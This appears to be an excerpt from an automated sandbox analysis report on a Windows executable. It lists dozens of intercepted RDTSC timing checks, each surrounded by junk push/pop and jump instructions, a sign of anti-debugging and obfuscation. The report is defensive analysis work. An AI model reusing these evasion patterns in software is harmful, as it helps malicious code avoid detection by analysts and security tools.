                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FFF333 second address: FFF342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FFEF28 second address: FFEF2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 1009598 second address: 100959D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 100959D second address: 10095C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB19h 0x00000007 push ecx 0x00000008 jng 00007FF34080AB06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 100E707 second address: 100E70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 100E70B second address: 100E711 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 100E711 second address: 100E758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF340810309h 0x0000000b js 00007FF340810332h 0x00000011 push esi 0x00000012 jmp 00007FF340810302h 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF3408102FAh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 100E758 second address: 100E75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 1010C5A second address: 1010C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 10229B4 second address: 10229B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 10229B8 second address: 10229CC instructions: 0x00000000 rdtsc 0x00000002 je 00007FF3408102F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FF3408102F6h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103BC90 second address: 103BC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103BC94 second address: 103BC9E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103BC9E second address: 103BCD3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF34080AB08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FF34080AB11h 0x00000015 popad 0x00000016 push esi 0x00000017 jmp 00007FF34080AB0Dh 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103AE32 second address: 103AE3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103AE3A second address: 103AE3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103AFA7 second address: 103AFC1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF340810305h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103B396 second address: 103B3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB11h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jnp 00007FF34080AB06h 0x00000011 jmp 00007FF34080AB19h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103B525 second address: 103B538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 jne 00007FF3408102F6h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103B538 second address: 103B553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB17h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103B553 second address: 103B55F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103B55F second address: 103B56F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jne 00007FF34080AB0Eh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103B817 second address: 103B81F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103B81F second address: 103B823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103B823 second address: 103B829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103B829 second address: 103B852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF34080AB11h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF34080AB0Eh 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103B852 second address: 103B857 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103B857 second address: 103B868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007FF34080AB06h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103B9B9 second address: 103B9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push edx 0x00000008 jnp 00007FF3408102F6h 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103B9CE second address: 103B9DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF34080AB06h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103B9DC second address: 103B9EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007FF3408102F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103B9EA second address: 103B9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF34080AB06h 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103D479 second address: 103D47D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103D47D second address: 103D48C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 ja 00007FF34080AB06h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 103D48C second address: 103D4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF340810300h 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 ja 00007FF3408102F6h 0x00000016 push edx 0x00000017 pop edx 0x00000018 popad 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 104393C second address: 104396B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB17h 0x00000009 jno 00007FF34080AB06h 0x0000000f popad 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007FF34080AB06h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 104396B second address: 10439A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FF34081030Ch 0x0000000f jmp 00007FF340810306h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56F0DC2 second address: 56F0DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop ebx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56F0DCD second address: 56F0DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esp 0x00000006 jmp 00007FF3408102FCh 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56F0DE8 second address: 56F0DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56F0DEC second address: 56F0DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56F0DF0 second address: 56F0DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56F0DF6 second address: 56F0E34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810304h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007FF3408102FEh 0x00000011 movzx ecx, di 0x00000014 pop ebx 0x00000015 push ecx 0x00000016 mov ebx, 3467B66Eh 0x0000001b pop edi 0x0000001c popad 0x0000001d pop ebp 0x0000001e pushad 0x0000001f movzx ecx, bx 0x00000022 push eax 0x00000023 push edx 0x00000024 mov ah, dl 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 574007D second address: 5740083 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5740083 second address: 57400C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810304h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF340810300h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF340810307h 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D00F1 second address: 56D0115 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF34080AB0Ch 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D0115 second address: 56D0174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF340810306h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FF3408102FEh 0x00000018 sub si, E138h 0x0000001d jmp 00007FF3408102FBh 0x00000022 popfd 0x00000023 mov bh, cl 0x00000025 popad 0x00000026 push dword ptr [ebp+04h] 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FF3408102FEh 0x00000030 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D0174 second address: 56D01BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FF34080AB17h 0x0000000b sub cx, FC5Eh 0x00000010 jmp 00007FF34080AB19h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push dword ptr [ebp+0Ch] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D01BC second address: 56D01C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D01C0 second address: 56D01C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D01C6 second address: 56D01CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D01CC second address: 56D01D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56F0705 second address: 56F0721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF340810308h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56F0721 second address: 56F0752 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF34080AB0Eh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF34080AB17h 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56F0752 second address: 56F0758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56F0758 second address: 56F075C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56F075C second address: 56F076C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56F076C second address: 56F0770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56F0770 second address: 56F0776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56F0776 second address: 56F077F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, E9E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56F03CE second address: 56F0438 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF3408102FEh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov cx, bx 0x00000014 pushfd 0x00000015 jmp 00007FF3408102FDh 0x0000001a and ch, FFFFFFD6h 0x0000001d jmp 00007FF340810301h 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF340810308h 0x0000002e rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56F0438 second address: 56F043C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56F043C second address: 56F0442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56F0442 second address: 56F046F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF34080AB17h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5700163 second address: 57001AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, DCh 0x0000000d pushfd 0x0000000e jmp 00007FF340810301h 0x00000013 sub ecx, 0497E776h 0x00000019 jmp 00007FF340810301h 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 mov eax, 3B3C9675h 0x0000002a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57001AB second address: 57001BA instructions: 0x00000000 rdtsc 0x00000002 mov cx, 24F1h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57001BA second address: 57001BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730EF2 second address: 5730F20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF34080AB17h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730F20 second address: 5730F44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730F44 second address: 5730F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730F48 second address: 5730F62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810306h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730F62 second address: 5730F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF34080AB0Eh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730F74 second address: 5730F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5730F78 second address: 5730F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF34080AB0Ah 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5710280 second address: 5710284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5710284 second address: 57102A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57102A1 second address: 57102B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3408102FCh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57102B1 second address: 57102B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57102B5 second address: 57102D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF3408102FEh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57102D3 second address: 57102D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57102D9 second address: 57102DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57102DF second address: 57102E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 57102E3 second address: 5710302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop ecx 0x00000012 mov ax, dx 0x00000015 popad 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5710302 second address: 5710329 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF34080AB0Ah 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5710329 second address: 571032D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 571032D second address: 5710333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5710333 second address: 5710344 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3408102FDh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 5710344 second address: 571037A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and dword ptr [eax], 00000000h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF34080AB18h 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 571037A second address: 5710389 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
